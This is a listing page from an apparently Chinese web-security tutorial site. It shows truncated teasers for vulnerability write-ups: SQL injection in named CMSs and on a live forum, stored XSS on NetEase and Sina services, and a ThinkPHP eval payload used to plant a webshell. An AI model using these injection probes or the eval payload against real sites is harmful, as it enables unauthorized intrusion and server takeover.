ZYCHCMS企业网站管理系统4.2注射及后台拿webshell关注热度:11

①SQL注射漏洞②后台拿WBSHELL详细说明：影响版本：ZYCHCMS企业网站管理系统4.2（存在以下两个文件的版本应该是通杀）①SQL注射漏洞漏洞文件：/admin/add_js.asp /admin/add_xm_jiang.asp漏洞原因：..[详情]

网易直播评论存储型XSS - 网站安全 - 自学php关注热度:13

网易手机直播评论存储型XSS,奥运期间满火的详细说明：http://live.163.com/3g/livelog/如：http://live.163.com/3g/livelog/42838/15/desc/0/1/page.do发表评论:http://live.163.com/3g/chatlog3g/42838/inputCh.....[详情]

新浪及网易邮箱预览存储型XSS - 网站安全 - 自学关注热度:13

今天看到goderci牛发的几个邮箱预览的XSS，觉得肯定还有木有被开发的宝地，于是就去尝试了一下，结果还真有，FLASH、WORD之后 似乎ZIP文件的过滤还没有被安排上议程。压缩文件有一个很..[详情]

178游戏网分站SQL注射 - 网站安全 - 自学php关注热度:13

手工测试、工具测试均显示为php+数字型注射http://bbs.ngacn.cc/read.php?pid=64832566%20and%201=1rand=0.14058642791337117http://bbs.ngacn.cc/read.php?pid=64832566%20and%201=2rand=0.14058642791337117.....[详情]

beescms X-Forwarded-For 注射 - 网站安全 - 自学php关注热度:13

member/member.php文件//........................ $ip=fl_html(fl_value(get_ip())); $sql=update .DB_PRE.member set member_time=#39;{$addtime}#39;,member_ip=#39;{$ip}#39; where id={$last.....[详情]

记一次对某SEO博客的渗透 - 网站安全 - 自学php关注热度:15

以下均谷歌翻译而来，与羽翼本人没有任何关系。某些东西是需要花钱才能看的，尤其是一些网赚的东西。今天看到一篇文章不错，可惜，要购买。于是就邪恶了一下。他的主站没有什..[详情]

关于mysql报错注入的几个语句 - 网站安全 - 自学关注热度:9

报错注入，报user表中的字段:select * from (select * from user a join user b) c;select * from (select * from user a join user b using (host,user)) c;报错注入select 1 from .....[详情]

探测网站(三)nikto探测Web服务器漏洞 - 网站安全关注热度:19

Nikto是一款开源的Web程序扫描器，可以扫描服务器中的存在的一些问题。Nikto是linux/Unix中的一款工具，可以从官方网站上下载，解压到本地运行。这里直接采用backtrack 5中集成的nikto工具..[详情]

探测网站(二)httprint探测Web服务器类型 - 网站安全关注热度:41

搭建Web服务器有很多流行的软件，如unix、linux下的apache、tomcat，windows下的IIS，IBM的 WebSphere，BEA WebLogic还有些小型轻量级的nginx、micro_httpd ndash; really small HTTP serve，LightTPD等.....[详情]

谷歌渗透测试之信息搜集 - 网站安全 - 自学php关注热度:22

渗透攻击要搜集足够的信息，谷歌就是一个强大的搜集信息的工具。谷歌除了平时的信息搜索外，还提供强大的高级命令，供我们进一步控制搜索的结果。1、intitle: 该命令限制搜索结果..[详情]

简单检测某门户站点 - 网站安全 - 自学php关注热度:10

首先到目标站看一眼程序源码随便翻了几个页面一眼看出程序是PHP的习惯性动作查看首页源代码很熟悉了织梦的系统~呵呵看到是织梦的系统了，脑子里瞬间闪现出的就是织梦的默认版本..[详情]

飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行关注热度:14

第一个方法 直接执行http://www.2cto.com /index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html直接拿菜刀连接。第二种方法：（这个好麻烦）可以执行构造SESSION，然后直接登录后台，依次执行下边..[详情]

探测网站(一)burp suite探测Web目录 - 网站安全 - 自关注热度:19

攻击目标之前，最重要的是收集信息，搜索引擎就可以自动爬取网站的内容，不过搜索引擎都要遵守robots协议(这个至于360搜索)，robots.txt是网站管理创建的一个txt文件，告诉搜索引擎哪..[详情]

公司客户信息与追踪管理系统CITMS 3.0 注入及上传关注热度:12

管理系统部分功能如下：（１）在线增加、修改、删除管理员（２）在线增加、修改、删除客户记录、支持HTML等..（３）前台记录有追踪功能．．以及追踪记录和点击次数显示源码下载..[详情]

用IPAD盲打PPTV后台 - 网站安全 - 自学php关注热度:12

昨晚带队测试完PPTV.睡前准备使用PPTV看会电影.登陆了我的2020年到期的PPTV会员帐号.发现有意见反馈.过段敲人一段跨站代码.ipad打字真费劲.校验了好几次.确认无误后发送.今天起床后就发..[详情]